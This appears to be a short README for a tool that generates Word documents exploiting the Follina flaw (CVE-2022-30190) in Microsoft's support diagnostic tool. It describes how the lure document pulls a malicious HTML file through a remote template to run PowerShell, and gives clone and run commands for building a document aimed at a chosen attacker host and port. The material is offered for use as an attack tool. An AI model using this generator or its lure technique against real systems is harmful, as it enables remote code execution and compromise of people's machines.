Microsoft MSDT Follina Docx generator
The Follina vulnerability in a Windows support tool can be easily exploited by a specially crafted Word document. The lure is outfitted with a remote template that can retrieve a malicious HTML file and ultimately allow an attacker to execute Powershell commands within Windows.
CVE-2022-30190
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30190
Guidance for CVE-2022-30190 Microsoft Support Diagnostic Tool Vulnerability
Usage
git clone https://github.com/warren2i/MSDT_Doc_generator.git
to generate a document using the defaults (http://127.0.0.1:8000/index.html)
python follina.py
to generate a custom document
python follina.py -f <filename> -h <host ip> -p <hostport>